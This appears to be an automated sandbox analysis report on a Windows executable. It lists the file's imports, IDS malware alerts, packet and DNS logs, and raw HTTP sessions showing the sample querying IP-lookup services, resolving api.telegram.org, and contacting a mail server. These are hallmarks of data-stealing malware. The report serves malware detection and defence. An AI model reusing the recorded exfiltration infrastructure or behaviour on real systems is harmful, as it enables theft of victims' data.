RT_VERSION | 0x7b590 | 0x3ac | data | English | United States | 0.4521276595744681
RT_MANIFEST | 0x7b940 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-12T07:36:32.879752+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-12T07:36:47.682495+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | TCP
2024-11-12T07:36:48.280641+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | TCP
2024-11-12T07:36:49.593155+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | TCP
2024-11-12T07:36:50.311923+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49717 | 188.114.96.3 | 443 | TCP
2024-11-12T07:36:51.686922+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49718 | 193.122.130.0 | 80 | TCP
2024-11-12T07:36:52.391719+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49719 | 188.114.96.3 | 443 | TCP
2024-11-12T07:37:12.770892+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.8 | 49732 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 07:36:44.717053890 CET | 49715 | 80 | 192.168.2.8 | 193.122.130.0
Nov 12, 2024 07:36:44.722009897 CET | 80 | 49715 | 193.122.130.0 | 192.168.2.8
Nov 12, 2024 07:36:44.722080946 CET | 49715 | 80 | 192.168.2.8 | 193.122.130.0
Nov 12, 2024 07:36:44.722284079 CET | 49715 | 80 | 192.168.2.8 | 193.122.130.0
Nov 12, 2024 07:36:44.727091074 CET | 80 | 49715 | 193.122.130.0 | 192.168.2.8
Nov 12, 2024 07:36:45.402075052 CET | 80 | 49715 | 193.122.130.0 | 192.168.2.8
Nov 12, 2024 07:36:45.417691946 CET | 49715 | 80 | 192.168.2.8 | 193.122.130.0
Nov 12, 2024 07:36:45.422462940 CET | 80 | 49715 | 193.122.130.0 | 192.168.2.8
Nov 12, 2024 07:36:47.658318043 CET | 80 | 49715 | 193.122.130.0 | 192.168.2.8
Nov 12, 2024 07:36:47.682495117 CET | 49715 | 80 | 192.168.2.8 | 193.122.130.0
Nov 12, 2024 07:36:47.687263966 CET | 80 | 49715 | 193.122.130.0 | 192.168.2.8
Nov 12, 2024 07:36:48.225405931 CET | 80 | 49715 | 193.122.130.0 | 192.168.2.8
Nov 12, 2024 07:36:48.280641079 CET | 49715 | 80 | 192.168.2.8 | 193.122.130.0
Nov 12, 2024 07:36:48.553524971 CET | 49716 | 443 | 192.168.2.8 | 188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:48.553554058 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:48.553627968 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:48.556220055 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:48.556241035 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.159504890 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.159663916 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.163140059 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.163151979 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.163546085 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.168298960 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.211333990 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.372411966 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.372477055 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.372725010 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.376367092 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.381944895 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:49.386667013 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.542319059 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.544523001 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.544550896 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.544629097 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.544976950 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.544986963 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.593154907 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:49.772830009 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.772902012 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.166886091 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.169265985 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:50.169285059 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.311671972 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.311779976 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.311834097 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:50.312345028 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:50.315977097 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.317079067 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.321166039 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.321254969 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.321928978 CET8049718193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.322000027 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.322083950 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.326889038 CET8049718193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.645483017 CET8049718193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.646617889 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:51.646661997 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.646737099 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:51.646949053 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:51.646960974 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.686922073 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.251847982 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.253742933 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:52.253762007 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.391729116 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.391799927 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.391866922 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:52.392374992 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:52.397572041 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.402369976 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.402575016 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.402673006 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.407494068 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.094225883 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.095655918 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.095702887 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.095827103 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.096111059 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.096118927 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.140062094 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.703167915 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.704869986 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.704895020 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.848361969 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.848434925 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.848485947 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.848997116 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.852669001 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.853851080 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.857697964 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.857781887 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.858782053 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.858850002 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.858944893 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.863661051 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:54.510622978 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:54.512037039 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:54.512092113 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:54.512190104 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:54.512447119 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:54.512454987 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:54.561873913 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.115391970 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.117129087 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:55.117147923 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.255525112 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.255582094 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.255637884 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:55.256084919 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:55.259562016 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.260620117 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.264617920 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.264691114 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.265510082 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.265571117 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.265676975 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.270432949 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:56.994812012 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:56.996154070 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:56.996191025 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:56.996279001 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:56.996551991 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:56.996562958 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.046325922 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.612670898 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.614273071 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:57.614295959 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.756067991 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.756124020 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.756176949 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:57.756611109 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:57.764748096 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.764807940 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.769526958 CET8049726193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.769620895 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.769855022 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.769925117 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.775499105 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.780468941 CET8049726193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.246047974 CET8049726193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.254535913 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:00.254576921 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.254645109 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:00.255064011 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:00.255078077 CET44349727188.114.97.3192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 12, 2024 07:36:39.546437025 CET | 192.168.2.8 | 1.1.1.1 | 0x47fd | Standard query (0) | api.onedrive.com | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:40.738440990 CET | 192.168.2.8 | 1.1.1.1 | 0x2133 | Standard query (0) | fa2ytg.dm.files.1drv.com | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:44.697698116 CET | 192.168.2.8 | 1.1.1.1 | 0x976b | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:48.542031050 CET | 192.168.2.8 | 1.1.1.1 | 0xb076 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:37:00.247168064 CET | 192.168.2.8 | 1.1.1.1 | 0xb7e9 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:37:03.509319067 CET | 192.168.2.8 | 1.1.1.1 | 0x42a1 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:37:10.467545033 CET | 192.168.2.8 | 1.1.1.1 | 0xe450 | Standard query (0) | mail.foodex.com.pk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 12, 2024 07:36:39.553090096 CET | 1.1.1.1 | 192.168.2.8 | 0x47fd | No error (0) | api.onedrive.com | common-afdrk.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 07:36:39.553090096 CET | 1.1.1.1 | 192.168.2.8 | 0x47fd | No error (0) | common-afdrk.fe.1drv.com | odc-commonafdrk-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 07:36:40.788109064 CET | 1.1.1.1 | 192.168.2.8 | 0x2133 | No error (0) | fa2ytg.dm.files.1drv.com | dm-files.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 07:36:40.788109064 CET | 1.1.1.1 | 192.168.2.8 | 0x2133 | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 07:36:44.704377890 CET | 1.1.1.1 | 192.168.2.8 | 0x976b | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 07:36:44.704377890 CET | 1.1.1.1 | 192.168.2.8 | 0x976b | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:44.704377890 CET | 1.1.1.1 | 192.168.2.8 | 0x976b | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:44.704377890 CET | 1.1.1.1 | 192.168.2.8 | 0x976b | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:44.704377890 CET | 1.1.1.1 | 192.168.2.8 | 0x976b | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:44.704377890 CET | 1.1.1.1 | 192.168.2.8 | 0x976b | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:48.549071074 CET | 1.1.1.1 | 192.168.2.8 | 0xb076 | No error (0) | reallyfreegeoip.org |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:48.549071074 CET | 1.1.1.1 | 192.168.2.8 | 0xb076 | No error (0) | reallyfreegeoip.org |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:37:00.253770113 CET | 1.1.1.1 | 192.168.2.8 | 0xb7e9 | No error (0) | reallyfreegeoip.org |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:37:00.253770113 CET | 1.1.1.1 | 192.168.2.8 | 0xb7e9 | No error (0) | reallyfreegeoip.org |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:37:03.518946886 CET | 1.1.1.1 | 192.168.2.8 | 0x42a1 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:37:10.557713032 CET | 1.1.1.1 | 192.168.2.8 | 0xe450 | No error (0) | mail.foodex.com.pk | foodex.com.pk |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 12, 2024 07:37:10.557713032 CET | 1.1.1.1 | 192.168.2.8 | 0xe450 | No error (0) | foodex.com.pk |  | 37.27.123.72 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | 5916 | C:\Users\user\Desktop\________.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:36:44.722284079 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 12, 2024 07:36:45.402075052 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:45 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 97414ebf9edf69bcc3980194983cee36
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
Nov 12, 2024 07:36:45.417691946 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 12, 2024 07:36:47.658318043 CET | 730 | IN | HTTP/1.1 502 Bad Gateway
Date: Tue, 12 Nov 2024 06:36:47 GMT
Content-Type: text/html
Content-Length: 547
Connection: keep-alive
X-Request-ID: 15255f87403a740c92d2139f634fa564
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 12, 2024 07:36:47.682495117 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 12, 2024 07:36:48.225405931 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:48 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e1ad9b294442f0d17e6bb703a52e2c87
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
Nov 12, 2024 07:36:49.381944895 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 12, 2024 07:36:49.542319059 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:49 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8ac156380a8e64f0ddce47e0cd5098f8
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
Nov 12, 2024 07:36:49.772830009 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:49 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8ac156380a8e64f0ddce47e0cd5098f8
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49718 | 193.122.130.0 | 80 | 5916 | C:\Users\user\Desktop\________.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:36:50.322083950 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 12, 2024 07:36:51.645483017 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:51 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 04264fd8a3a4948c8371a9db31b0a83b
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49720 | 193.122.130.0 | 80 | 5916 | C:\Users\user\Desktop\________.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:36:52.402673006 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 12, 2024 07:36:53.094225883 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:53 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7a7c8b35689292caa9d71d0274172e1c
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49722 | 193.122.130.0 | 80 | 5916 | C:\Users\user\Desktop\________.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:36:53.858944893 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 12, 2024 07:36:54.510622978 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:54 GMT
